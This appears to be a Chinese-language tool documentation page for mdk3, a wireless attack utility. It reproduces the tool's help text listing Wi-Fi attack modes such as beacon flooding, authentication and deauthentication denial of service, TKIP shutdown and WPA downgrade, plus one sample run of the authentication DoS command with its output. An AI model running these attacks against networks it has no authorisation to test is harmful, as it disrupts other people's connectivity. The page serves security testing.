MDK是概念验证的工具来利用通用IEEE 802.11协议的弱点。重要提示:这是你的责任,以确保你有从网络所有者的权限运行MDK反对它。

mdk3首页 | 卡利mdk3回购

  • 作者:k2wrlz的ASPJ
  • 许可:GPL第二版

    0x01 包含在mdk3包工具

    mdk3 - 无线攻击工具对IEEE 802.11网络
    :~# mdk3 --help
    MDK 3.0 v6 - "Yeah, well, whatever"
    by ASPj of k2wrlz, using the osdep library from aircrack-ng
    And with lots of help from the great aircrack-ng community:
    Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
    telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
    MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
    IMPORTANT: It is your responsibility to make sure you have permission from the
    network owner before running MDK against it.
    This code is licenced under the GPLv2
    mdk3 <interface> <test_mode> [test_options]
    Try mdk3 --fullhelp for all test options
    Try mdk3 --help <test_mode> for info about one test only
    b   - Beacon Flood Mode
        Sends beacon frames to show fake APs at clients.
        This can sometimes crash network scanners and even drivers!
    a   - Authentication DoS mode
        Sends authentication frames to all APs found in range.
        Too much clients freeze or reset some APs.
    p   - Basic probing and ESSID Bruteforce mode
        Probes AP and check for answer, useful for checking if SSID has
        been correctly decloaked or if AP is in your adaptors sending range
        SSID Bruteforcing is also possible with this test mode.
    d   - Deauthentication / Disassociation Amok Mode
        Kicks everybody found from AP
    m   - Michael shutdown exploitation (TKIP)
        Cancels all traffic continuously
    x   - 802.1X tests
    w   - WIDS/WIPS Confusion
        Confuse/Abuse Intrusion Detection and Prevention Systems
    f   - MAC filter bruteforce mode
        This test uses a list of known client MAC Adresses and tries to
        authenticate them to the given AP while dynamically changing
        its response timeout for best performance. It currently works only
        on APs who deny an open authentication request properly
    g   - WPA Downgrade test
        deauthenticates Stations and APs sending WPA encrypted packets.
        With this test you can check if the sysadmin will try setting his
        network to WEP or disable encryption.

    0x02 mdk3用法示例

    使用无线接口 (为wlan0)运行 验证DOS模式下的测试 (一):
:~# mdk3 wlan0 a
Trying to get a new target AP...                  
AP 9C:D3:6D:B8:FF:56 is responding!           
Connecting Client: 00:00:00:00:00:00 to target AP: 9C:D3:6D:B8:FF:56
Connecting Client: 00:00:00:00:00:00 to target AP: 9C:D3:6D:B8:FF:56
AP 9C:D3:6D:B8:FF:56 seems to be INVULNERABLE!      
Device is still responding with   500 clients connected!
Trying to get a new target AP...                  
AP E0:3F:49:6A:57:78 is responding!           
Connecting Client: 00:00:00:00:00:00 to target AP: E0:3F:49:6A:57:78
AP E0:3F:49:6A:57:78 seems to be INVULNERABLE!


results matching ""

    No results matching ""